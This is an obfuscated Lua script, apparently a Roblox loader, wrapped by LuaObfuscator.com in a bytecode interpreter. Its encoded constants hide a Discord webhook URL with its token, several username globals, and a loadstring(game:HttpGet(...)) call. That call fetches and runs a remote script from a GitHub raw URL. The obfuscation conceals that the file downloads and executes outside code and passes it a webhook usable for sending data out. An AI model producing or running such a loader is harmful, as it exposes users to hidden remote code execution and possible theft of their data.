--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));return "";end end else local v71=v2(v0(v30,16));if v19 then local v79=v5(v71,v19);v19=nil;return v79;else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(877 -(282 + 595)) -0 ;local v73;while true do if (v72==(0 -(1637 -(1523 + 114)))) then v73=(v31/(2^(v32-(1 -0))))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v73-(v73%(569 -(367 + 201))) ;end end else local v74=927 -(214 + 713) ;local v75;while true do if (v74==0) then v75=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v75 + v75))>=v75) and (1 + 0)) or 0 ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=958 -(892 + 65) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -((234 -147) + 263)) );v18=v18 + (9 -5) ;return (v41 * ((22382201 -10043361) + 4438376)) + (v40 * (260471 -(141892 + 53043))) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1000 -(915 + 82))) then if (v47==(0 -(0 + 0))) then if (v46==(1138 -(116 + 1022))) then return v48 * (0 + 0) ;else v47=1 -(0 -0) ;v45=0 + 0 ;end elseif (v47==(3234 -(1069 + 118))) then return ((v46==(0 -0)) and (v48 * ((1 -0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(178 + 845) ) * (v45 + (v46/((3 -(3 -2))^(52 + 0)))) ;end if (v42==(791 -(368 + 423))) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==(3 -1)) then v47=v20(v44,(1 + 38) -(10 + 8) ,119 -88 );v48=((v20(v44,32)==(3 -2)) and  -(4 -3)) or (443 -(416 + 26)) ;v42=9 -6 ;end if (v42==(1 + 0)) then v45=1 -0 ;v46=(v20(v44,439 -(145 + 293) ,(354 + 96) -(44 + 386) ) * ((1915 -(1789 + (1179 -(87 + 968))))^(1518 -(998 + 488)))) + v43 ;v42=(4 -3) + 1 ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(1414 -(447 + 966)) );v18=v18 + v49 ;v50=5 -(17 -(9 + 5)) ;end if (v50==(1820 -(1703 + 114))) then return v6(v52);end if (v50==(1265 -(243 + 1022))) then v51=nil;if  not v49 then local v96=701 -(376 + 325) ;while true do if (v96==0) then v49=v23();if (v49==(0 -(0 -0))) then return "";end break;end end end v50=2 -(377 -(85 + 291)) ;end if (v50==(1 + 1)) then v52={};for v80=2 -1 , #v51 do v52[v80]=v2(v1(v3(v51,v80,v80)));end v50=3;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v53==(2 + 0)) then v58=nil;v59=nil;v53=3;end if (v53~=1) then else v56=nil;v57=nil;v53=2;end if (v53==3) then v60=nil;v61=nil;v53=4;end if (v53==(580 -(361 + 219))) then v54=320 -(53 + 267) ;v55=nil;v53=1;end if (v53==4) then v62=nil;while true do if (v54==(1 + 0)) then v57=nil;v58=nil;v54=2;end if (v54==(413 -(15 + 398))) then local v100=982 -(18 + 964) ;while true do if (v100==0) then v55=0;v56=nil;v100=1;end if ((3 -2)~=v100) then else v54=1 + 0 ;break;end end end if (v54~=(2 + 1)) then else v61=nil;v62=nil;v54=854 -(20 + 830) ;end if (v54~=(4 + 0)) then else while true do if (v55==3) then v62=nil;while true do local v108=126 -(116 + 10) ;local v109;while true do if (v108==(0 + 0)) then v109=738 -(542 + 196) ;while true do if (v109~=(0 -0)) then else local v157=0 + 0 ;local v158;while true do if (v157==0) then v158=0;while true do if (v158~=0) then else if (v56==(1 + 0)) then local v172=0 + 0 ;local v173;local v174;while true do if (v172~=1) then else while true do if (v173==0) then v174=0;while true do if (0~=v174) then else local v194=0;local v195;while true do if (v194==(0 -0)) then v195=0;while true do if (v195~=(2 -1)) then else v174=1552 -(1126 + 425) ;break;end if (v195~=(405 -(118 + 287))) then else v60={v57,v58,nil,v59};v61=v23();v195=1122 -(118 + 1003) ;end end break;end end end if (1==v174) then v62={};v56=5 -3 ;break;end end break;end end break;end if (v172~=(377 -(142 + 235))) then else v173=0 -0 ;v174=nil;v172=1;end end end if (v56==(1 + 2)) then local v175=0;while true do if (v175~=(977 -(553 + 424))) then else local v176=0;local v177;while true do if (v176==(0 -0)) then v177=0;while true do if (v177==(0 + 0)) then for v196=1 + 0 ,v23() do v58[v196-1 ]=v28();end return v60;end end break;end end end end end v158=1 + 0 ;end if (v158==(1 + 0)) then v109=1 + 0 ;break;end end break;end end end if (v109~=(2 -1)) then else if ((0 -0)~=v56) then else local v166=0 -0 ;local v167;local v168;while true do if (v166==0) then v167=0 + 0 ;v168=nil;v166=4 -3 ;end if (v166~=1) then else while true do if (0~=v167) then else v168=0;while true do if (v168==(754 -(239 + 514))) then v59={};v56=1 + 0 ;break;end if ((1329 -(797 + 532))==v168) then local v178=0;local v179;while true do if (v178~=0) then else v179=0;while true do if (v179==1) then v168=1 + 0 ;break;end if ((0 + 0)==v179) then v57={};v58={};v179=2 -1 ;end end break;end end end end break;end end break;end end end if (v56==2) then local v169=1202 -(373 + 829) ;local v170;local v171;while true do if (v169~=1) then else while true do if ((731 -(476 + 255))~=v170) then else v171=0;while true do if ((1131 -(369 + 761))~=v171) then else for v181=1,v23() do local v182=0 + 0 ;local v183;local v184;local v185;local v186;while true do if (v182~=2) then else while true do if (v183~=(0 -0)) then else local v198=0;while true do if (v198~=1) then else v183=1;break;end if (v198==0) then v184=0 -0 ;v185=nil;v198=239 -(64 + 174) ;end end end if (v183~=1) then else v186=nil;while true do if ((0 + 0)==v184) then local v199=0;local v200;while true do if (0~=v199) then else v200=0;while true do if ((0 -0)==v200) then local v208=0;while true do if (v208==1) then v200=1;break;end if (v208~=(336 -(144 + 192))) then else v185=216 -(42 + 174) ;v186=nil;v208=1 + 0 ;end end end if (v200==1) then v184=1 + 0 ;break;end end break;end end end if (v184~=1) then else while true do if (v185~=(0 + 0)) then else v186=v21();if (v20(v186,1505 -(363 + 1141) ,1)==0) then local v203=0;local v204;local v205;local v206;local v207;while true do if (v203==(1581 -(1183 + 397))) then local v210=0;while true do if (v210~=1) then else v203=5 -3 ;break;end if (v210~=0) then else v206=nil;v207=nil;v210=1;end end end if (v203~=(0 + 0)) then else v204=0 + 0 ;v205=nil;v203=1976 -(1913 + 62) ;end if (v203==(2 + 0)) then while true do if (v204~=3) then else if (v20(v206,7 -4 ,1936 -(565 + 1368) )~=(3 -2)) then else v207[4]=v62[v207[4]];end v57[v181]=v207;break;end if (v204==(1663 -(1477 + 184))) then local v212=0 -0 ;while true do if (v212==(1 + 0)) then v204=3;break;end if (v212~=0) then else if (v20(v206,1,1)==(857 -(564 + 292))) then v207[2]=v62[v207[2 -0 ]];end if (v20(v206,2,2)~=(2 -1)) then else v207[307 -(244 + 60) ]=v62[v207[3 + 0 ]];end v212=1;end end end if (v204~=1) then else local v213=476 -(41 + 435) ;while true do if (v213==1) then v204=2;break;end if (v213~=(1001 -(938 + 63))) then else local v218=0;while true do if (v218==1) then v213=1 + 0 ;break;end if (0~=v218) then else v207={v22(),v22(),nil,nil};if (v205==(1613 -(1565 + 48))) then local v223=0 + 0 ;while true do if (v223~=(1138 -(782 + 356))) then else v207[3]=v22();v207[4]=v22();break;end end elseif (v205==(268 -(176 + 91))) then v207[3]=v23();elseif (v205==(4 -2)) then v207[3]=v23() -((2 -0)^16) ;elseif (v205==3) then local v228=1092 -(975 + 117) ;local v229;local v230;while true do if (v228~=(1876 -(157 + 1718))) then else while true do if (v229~=(0 + 0)) then else v230=0 -0 ;while true do if (v230==0) then v207[3]=v23() -((6 -4)^16) ;v207[1022 -(697 + 321) ]=v22();break;end end break;end end break;end if (v228~=(0 -0)) then else v229=0;v230=nil;v228=1;end end end v218=1 -0 ;end end end end end if (v204==(0 -0)) then local v214=0;local v215;while true do if (v214~=(0 + 0)) then else v215=0 -0 ;while true do if (v215~=1) then else v204=2 -1 ;break;end if (v215~=0) then else v205=v20(v186,1229 -(322 + 905) ,614 -(602 + 9) );v206=v20(v186,1193 -(449 + 740) ,878 -(826 + 46) );v215=948 -(245 + 702) ;end end break;end end end end break;end end end break;end end break;end end break;end end break;end if ((0 -0)~=v182) then else v183=0;v184=nil;v182=1 + 0 ;end if (v182~=(1899 -(260 + 1638))) then else v185=nil;v186=nil;v182=2;end end end v56=3;break;end if (v171==(440 -(382 + 58))) then local v180=0 -0 ;while true do if (v180~=1) then else v171=1;break;end if ((0 + 0)~=v180) then else for v188=1 -0 ,v61 do local v189=0 -0 ;local v190;local v191;local v192;local v193;while true do if ((1206 -(902 + 303))~=v189) then else v192=nil;v193=nil;v189=3 -1 ;end if (v189~=(4 -2)) then else while true do if (v190==(0 + 0)) then v191=1690 -(1121 + 569) ;v192=nil;v190=215 -(22 + 192) ;end if (v190~=1) then else v193=nil;while true do if (1==v191) then if (v192==(684 -(483 + 200))) then v193=v21()~=0 ;elseif (v192==(1465 -(1404 + 59))) then v193=v24();elseif (v192~=(8 -5)) then else v193=v25();end v62[v188]=v193;break;end if (v191~=(0 -0)) then else local v202=765 -(468 + 297) ;while true do if (v202~=0) then else local v209=0;while true do if (v209==0) then v192=v21();v193=nil;v209=1;end if (1~=v209) then else v202=1;break;end end end if (v202==(563 -(334 + 228))) then v191=1;break;end end end end break;end end break;end if (v189==0) then v190=0;v191=nil;v189=1;end end end v60[10 -7 ]=v21();v180=2 -1 ;end end end end break;end end break;end if (0==v169) then v170=0;v171=nil;v169=1;end end end break;end end break;end end end break;end if (v55==1) then local v106=0;while true do if (v106==(0 -0)) then local v118=0;while true do if (v118~=(1 + 0)) then else v106=237 -(141 + 95) ;break;end if (0~=v118) then else v58=nil;v59=nil;v118=1;end end end if (v106~=(1 + 0)) then else v55=2;break;end end end if (v55~=0) then else v56=0 -0 ;v57=nil;v55=2 -1 ;end if (v55==(1 + 1)) then local v107=0 -0 ;while true do if (v107==(0 + 0)) then local v119=0;while true do if (v119~=0) then else v60=nil;v61=nil;v119=1;end if (v119~=(1 + 0)) then else v107=1 -0 ;break;end end end if (v107==1) then v55=2 + 1 ;break;end end end end break;end if ((165 -(92 + 71))==v54) then local v101=0;while true do if (v101~=(0 + 0)) then else v59=nil;v60=nil;v101=1 -0 ;end if (v101~=1) then else v54=768 -(574 + 191) ;break;end end end end break;end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...)local v82=v67;local v83=v68;local v84=v69;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v97=0,v90 do if (v97>=v84) then v88[v97-v84 ]=v89[v97 + 1 ];else v92[v97]=v89[v97 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=5) then if (v95<=2) then if (v95<=0) then v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v86=v94[3];elseif (v95>1) then do return;end else v92[v94[2]]=v94[3];end elseif (v95<=3) then v92[v94[2]][v94[3]]=v94[4];elseif (v95>4) then v86=v94[3];else local v123=v94[2];local v124,v125=v85(v92[v123](v13(v92,v123 + 1 ,v94[3])));v87=(v125 + v123) -1 ;local v126=0;for v151=v123,v87 do local v152=0;while true do if (v152==0) then v126=v126 + 1 ;v92[v151]=v124[v126];break;end end end end elseif (v95<=8) then if (v95<=6) then v92[v94[2]]();elseif (v95>7) then v92[v94[2]]=v94[3]~=0 ;else local v128=v94[2];v92[v128]=v92[v128](v13(v92,v128 + 1 ,v87));end elseif (v95<=10) then if (v95==9) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else local v130;local v131,v132;local v133;local v134;v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v65[v94[3]];v86=v86 + 1 ;v94=v82[v86];v134=v94[2];v133=v92[v94[3]];v92[v134 + 1 ]=v133;v92[v134]=v133[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3]~=0 ;v86=v86 + 1 ;v94=v82[v86];v134=v94[2];v131,v132=v85(v92[v134](v13(v92,v134 + 1 ,v94[3])));v87=(v132 + v134) -1 ;v130=0;for v153=v134,v87 do v130=v130 + 1 ;v92[v153]=v131[v130];end v86=v86 + 1 ;v94=v82[v86];v134=v94[2];v92[v134]=v92[v134](v13(v92,v134 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v86=v94[3];end elseif (v95==11) then local v146=0;local v147;local v148;while true do if (1==v146) then v92[v147 + 1 ]=v148;v92[v147]=v148[v94[4]];break;end if (v146==0) then v147=v94[2];v148=v92[v94[3]];v146=1;end end else v92[v94[2]]=v65[v94[3]];end v86=v86 + 1 ;end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132343835303736393O383330313039372F4C4239446B6D4B6B4A795A72796F4F455A654548505A626330686230525A4E354E475773676B596F453730347972676959706537786456365A724B396E744D684B794A4E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O00457865637574655F2O372O3603093O00557365724E616D653203083O004B6162697361303400173O0012013O00013O0026093O000E000100020004053O000E000100120C000100033O00300A00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026093O0001000100010004053O0001000100120C000100033O00302O0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00023O00017O00",v9(),...);end
